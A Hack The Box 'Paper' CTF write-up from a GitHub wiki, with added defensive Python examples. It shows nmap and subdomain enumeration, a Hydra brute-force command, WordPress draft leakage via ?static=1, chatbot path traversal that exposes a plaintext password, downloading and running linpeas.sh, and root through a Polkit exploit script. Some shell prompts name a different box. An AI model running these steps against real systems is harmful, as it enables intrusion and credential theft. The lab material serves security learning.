HTB_Paper - meruneru/tech_memo GitHub Wiki

Machine - Paper

 Step 0:

  Determine the target domain -> paper.htb

 Step 1:

  Enumerate subdomains -> office.paper, chat.office.paper

 Step 2:

  Extract endpoints

 Step 3:

  Extract parameters

 Step 4:

  Start scanning

port scan

Three services: #ssh, #http, #https

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ nmap -sV -sC -Pn paper.htb -oN nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-20 09:03 EDT
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.19s latency). 
Not shown: 997 closed ports 
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:  
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http    Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Enumeration

┌──(kali㉿kali)-[~/htb/Crocodile]
└─$ gobuster dir -u paper.htb -w ~/wordlist/common.txt      


/manual

Subdomain discovery

The X-Backend-Server response header revealed a hostname, office.paper.

(image: Pasted image 20220521131022.png)

Added office.paper to /etc/hosts.

(image: Pasted image 20220521132633.png)

Incidentally, I also tried wfuzz, but it found nothing in particular.

$ sudo wfuzz -w subdomains-top1million-110000.txt -c -f wfuzz-output.txt -u "paper.htb" -H "HOST:FUZZ.paper.htb" --hc 301
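The office.paper hostname above was handed out by the server itself in an X-Backend-Server header. The following is an added example (not part of the original writeup) of the check a defender would run against their own site: parse a raw HTTP response and flag watched headers that name a host other than the one requested. The list of watched headers and the sample response are constructed for this example.

```python
import re

# Response headers that commonly echo origin / upstream details.
# This list is an assumption for the example, not an exhaustive catalogue.
LEAKY_HEADERS = {"x-backend-server", "server", "via", "x-powered-by", "x-forwarded-host"}

# A hostname: dot-separated labels ending in an alphabetic label, so version
# strings such as "2.4.37" or "1.1.1k" in the Server header do not match.
HOSTNAME_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b", re.IGNORECASE)

# Constructed sample: a raw response resembling the 403 paper.htb returns.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Date: Sat, 21 May 2022 13:10:22 GMT\r\n"
    b"Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\r\n"
    b"X-Backend-Server: office.paper\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<html>...</html>"
)


def parse_headers(raw):
    """Split a raw HTTP/1.1 response into a {lowercase-name: value} dict."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def find_leaked_hostnames(headers, requested_host):
    """Return (header, hostname) pairs where a watched header names a host
    other than the one the client asked for."""
    findings = []
    for name, value in headers.items():
        if name not in LEAKY_HEADERS:
            continue
        for host in HOSTNAME_RE.findall(value):
            if host.lower() != requested_host.lower():
                findings.append((name, host))
    return findings


if __name__ == "__main__":
    for header, host in find_leaked_hostnames(parse_headers(SAMPLE_RESPONSE), "paper.htb"):
        print(f"{header} discloses internal hostname: {host}")
```

Run against the constructed response it reports the X-Backend-Server value and stays quiet about the Server banner. Where such a header is produced by a proxy layer you control, the fix is to strip it at the edge (with mod_headers, `Header unset X-Backend-Server`) rather than to rely on the value being uninteresting.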

A port scan of office.paper shows WordPress 5.2.3 running.

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ nmap -sV -sC -Pn office.paper -oN nmap2.txt     
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-21 02:13 EDT
Nmap scan report for office.paper (10.10.11.143)
Host is up (0.20s latency).
rDNS record for 10.10.11.143: paper.htb
Not shown: 989 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp    open     http       Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: WordPress 5.2.3
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
443/tcp   open     ssl/ssl    Apache httpd (SSL-only mode)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1066/tcp  filtered fpo-fns
1145/tcp  filtered x9-icue
3945/tcp  filtered emcads
4001/tcp  filtered newoak
5051/tcp  filtered ida-agent
10082/tcp filtered amandaidx
10566/tcp filtered unknown
20222/tcp filtered ipulse-ics

Access

http://paper.htb/manual  The Apache documentation page. Apache 2.4.

http://office.paper/  Leads to a blog page.

http://office.paper/wp-login.php  There is a login link at the very bottom of the blog. Appears to be WordPress.

I tried brute-forcing the password with #hydra but gave up because it took too long.

hydra -l prisonmike -P ~/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt office.paper http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Foffice.paper%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V

Foothold

Try a WordPress vulnerability.

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit Wordpress 5.2.3                    
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
WordPress Core 5.2.3 - Cross-Site Host Modification                         | php/webapps/47361.pl
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts     | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                     | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities         | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                   | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                 | php/webapps/48918.sh
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Read the description in /usr/share/exploitdb/exploits/multiple/webapps/47690.md.

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md
So far we know that adding `?static=1` to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format


In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:                                                                                                              

Requesting the URL below exposes posts that are still in draft state: http://office.paper/?static=1&order=desc

One of the drafts says an account can be created at the following URL: http://chat.office.paper/register/8qozr226AhkCHZdyY

Add chat.office.paper to /etc/hosts.

This leads to Rocket.Chat: http://chat.office.paper/home

Talking to the bot should yield the information needed to log in over SSH...

ID: dwight
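A site owner cannot patch a vulnerable WordPress retroactively, but the static=1 requests that trigger this draft/private-post disclosure are easy to spot in the access log. The following is an added example (not part of the original writeup or of the 47690 advisory): a parser for Apache's combined log format that reports every static=1 request together with the ordering parameters 47690.md lists. The log lines, IPs and timestamps are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat, the default on CentOS.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters 47690.md names as ways to reorder the leaked result set.
ORDERING_PARAMS = ("order", "orderby", "m")

# Constructed sample lines; addresses and timestamps are made up for this example.
SAMPLE_LOG = """\
10.10.14.3 - - [21/May/2022:13:10:22 +0000] "GET /?static=1&order=desc HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.3 - - [21/May/2022:13:10:31 +0000] "GET /?static=1 HTTP/1.1" 200 4877 "-" "Mozilla/5.0"
203.0.113.7 - - [21/May/2022:13:11:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.7 - - [21/May/2022:13:11:09 +0000] "GET /?p=12&order=asc HTTP/1.1" 200 6012 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_static_probe(target):
    """True when the request carries static=1, the trigger for the draft/private post leak."""
    query = parse_qs(urlsplit(target).query)
    return query.get("static", [""])[0] == "1"


def scan_log(text):
    """One finding per static=1 request: source IP, target, status code and
    which of the ordering parameters accompanied it."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if not entry or not is_static_probe(entry["target"]):
            continue
        query = parse_qs(urlsplit(entry["target"]).query)
        findings.append({
            "ip": entry["ip"],
            "target": entry["target"],
            "status": int(entry["status"]),
            "ordering": [p for p in ORDERING_PARAMS if p in query],
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['target']} -> {f['status']} ordering={f['ordering']}")
```

On the sample the two requests from 10.10.14.3 are reported and the ordinary blog traffic is not. A 200 on such a request is the signal that the installation is still on the affected release; the ordinary `?p=12&order=asc` line shows why the ordering parameters alone are not worth alerting on.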

recyclops list ../
recyclops list ../.ssh
recyclops list ../hubot
recyclops file ../hubot/.env

<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

Tried logging in to Rocket.Chat as recyclops/Queenofblad3s!23, but it was rejected.

(image: Pasted image 20220521171719.png)
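The bot above hands back `../hubot/.env` because its `file` command joins whatever path it is given onto its working directory and reads the result. The following is an added example, not the Hubot script from the box, showing that naive handler next to a confined one that resolves the path first and refuses anything outside the directory it is meant to serve. The directory layout (a `files/` directory to serve and a sibling `hubot/.env`) and the placeholder secret are constructed for this example.

```python
import os
import tempfile


def read_file_unsafe(base_dir, user_path):
    """How a naive 'file <path>' command behaves: the user-supplied path is
    joined to the bot's directory and read as-is, so '../hubot/.env' walks
    straight out of the intended directory."""
    with open(os.path.join(base_dir, user_path), "r", encoding="utf-8") as fh:
        return fh.read()


def read_file_confined(base_dir, user_path):
    """Hardened variant: resolve symlinks and '..' first, then refuse any
    path whose real location is not inside base_dir."""
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"refusing to read outside {root}: {user_path!r}")
    with open(candidate, "r", encoding="utf-8") as fh:
        return fh.read()


def build_demo_tree():
    """Constructed layout: <home>/files/ is what the bot should serve,
    <home>/hubot/.env is a sibling holding credentials (placeholder value)."""
    home = tempfile.mkdtemp(prefix="bot-demo-")
    os.makedirs(os.path.join(home, "files"))
    os.makedirs(os.path.join(home, "hubot"))
    with open(os.path.join(home, "files", "report.txt"), "w", encoding="utf-8") as fh:
        fh.write("quarterly numbers\n")
    with open(os.path.join(home, "hubot", ".env"), "w", encoding="utf-8") as fh:
        fh.write("export ROCKETCHAT_PASSWORD='placeholder-not-a-real-secret'\n")
    return home


def demo():
    """Exercise both handlers against the constructed tree and report what each allowed."""
    home = build_demo_tree()
    serve_dir = os.path.join(home, "files")
    results = {
        "unsafe_reads_env": "ROCKETCHAT_PASSWORD" in read_file_unsafe(serve_dir, "../hubot/.env"),
        "confined_allows_report": read_file_confined(serve_dir, "report.txt").startswith("quarterly"),
    }
    try:
        read_file_confined(serve_dir, "../hubot/.env")
        results["confined_blocks_env"] = False
    except PermissionError:
        results["confined_blocks_env"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Because the check is done on the resolved path, a symlink planted inside the served directory that points at `.env` is refused just like a literal `..`. Path confinement only limits what the bot will hand out, though; the second lesson from this box is that the bot ran as the same account that owned the `.env` and the SSH login, so a dedicated low-privilege service account for the bot would have kept the file unreadable to it in the first place.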

SSH access

$ ssh dwight@paper.htb
PW: Queenofblad3s!23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ cat /etc/passwd

rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash

Getting root

LinPEAS

Gather information for privilege escalation by running #LinPEAS github.

Since the strapi server has no DNS, fetch the file with wget from a copy placed on the local kali box.

kali $ wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh

kali $ python3 -m http.server 8000

strapi@horizontall:/tmp$ wget http://10.10.14.3:8000/linpeas.sh
strapi@horizontall:/tmp$ chmod +x linpeas.sh
strapi@horizontall:/tmp$ ./linpeas.sh

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.29

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin
New path exported: /home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:
/sbin:/bin

╔══════════╣ Cron jobs                                                                                        
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
@reboot /home/dwight/bot_restart.sh >> /home/dwight/hubot/.hubot.log 2>&1
incrontab Not Found                                    
-rw-r--r--. 1 root root   0 Nov  8  2019 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jan 12  2021 /etc/crontab

The vulnerability at https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation looked usable, but the script in that GitHub repository did not work for me. The script found in searchsploit did.

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit polkit
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege  | linux/local/47167.sh
Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)         | linux/local/47543.rb
PolicyKit polkit-1 < 0.101 - Local Privilege Escalation                     | linux/local/17932.c
polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork         | linux/dos/46105.c
Polkit 0.105-26 0.117-2 - Local Privilege Escalation                        | linux/local/50011.sh
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active S | linux/dos/46743.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ searchsploit -m 50011.sh 

┌──(kali㉿kali)-[~/share/ctf/htb/paper]
└─$ nkf -w -Lu --overwrite 50011.sh

I sent 50011.sh to the victim and ran it; it creates an account hacked/password, and following the commands the script prints got me root.
